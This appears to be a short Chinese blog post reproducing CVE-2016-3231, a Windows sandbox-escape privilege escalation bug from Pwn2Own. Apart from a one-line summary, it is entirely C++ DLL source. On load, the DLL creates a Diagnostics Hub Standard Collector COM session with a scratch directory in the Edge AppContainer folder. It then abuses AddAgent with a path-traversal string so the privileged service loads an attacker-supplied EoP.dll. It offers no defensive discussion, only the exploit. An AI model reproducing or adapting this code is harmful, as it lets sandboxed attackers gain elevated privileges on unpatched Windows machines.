CVE-2016-3231

摘要：重現了下韓國小哥Lokihardt在pwn2own上的過沙箱提權漏洞。

 

 1 #include <windows.h>
 2 #include <atlbase.h>  3 #include "DiagnosticsHub.StandardCollector.Runtime_h.h"  4  5 BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)  6 {  7 switch (ul_reason_for_call)  8  {  9 case DLL_PROCESS_ATTACH: 10  { 11 WCHAR user_name[MAX_PATH] = { 0 }; 12 DWORD name_size = sizeof(user_name); 13 GetUserName(user_name, &name_size); 14 15 CoInitialize(0); 16 17  HRESULT hr; 18  CLSID clsid_hub; 19  IID iid_IStandardCollectorService; 20 IStandardCollectorService * i_StandardCollectorService; 21 22 CLSIDFromString(L"{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}", &clsid_hub); 23 CLSIDFromString(L"{0D8AF6B7-EFD5-4F6D-A834-314740AB8CAA}", &iid_IStandardCollectorService); 24 25 hr = CoCreateInstance(clsid_hub, NULL, CLSCTX_LOCAL_SERVER, iid_IStandardCollectorService, (LPVOID*)&i_StandardCollectorService); 26 if (FAILED(hr)) 27  { 28 printf("CoCreateInstance failed: %08x\n", hr); 29  } 30 31  SessionConfiguration session_config; 32 ICollectionSession * i_CollectionSession = { 0 }; 33 WCHAR scratch_path[MAX_PATH] = { 0 }; 34 35 wsprintf(scratch_path, L"C:\\Users\\%ws\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp", user_name); 36 session_config.Type = CollectionType_Etw; 37 session_config.Location = CollectionLocation_Local; 38 session_config.Flags = SessionConfigurationFlags_None; 39 session_config.LifetimeMonitorProcessId = 0; 40 session_config.SessionId = {}; 41 session_config.CollectorScratch = CComBSTR(scratch_path); 42 session_config.ClientLocale = 0; 43 44 hr = i_StandardCollectorService->CreateSession(&session_config, nullptr, &i_CollectionSession); 45 if (FAILED(hr)) 46  { 47 printf("CreateSession failed: %08x\n", hr); 48  } 49 50 WCHAR dll_path[MAX_PATH] = { 0 }; 51 GUID guid = GUID_NULL; 52 53 //wsprintf(dll_path, L"..\\..\\..\\..\\Users\\%ws\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\EoP.dll", user_name); 54 wsprintf(dll_path, L"..\\..\\..\\..\\Users\\%ws\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\EoP.dll", user_name); 55 hr = i_CollectionSession->AddAgent(dll_path, &guid); 56 if (FAILED(hr)) 57  { 58 printf("AddAgent failed: %08x\n", hr); 59  } 60 61 break; 62  } 63 case DLL_THREAD_ATTACH: 64 break; 65 case DLL_THREAD_DETACH: 66 break; 67 case DLL_PROCESS_DETACH: 68 break; 69  } 70 71 return TRUE; 72 }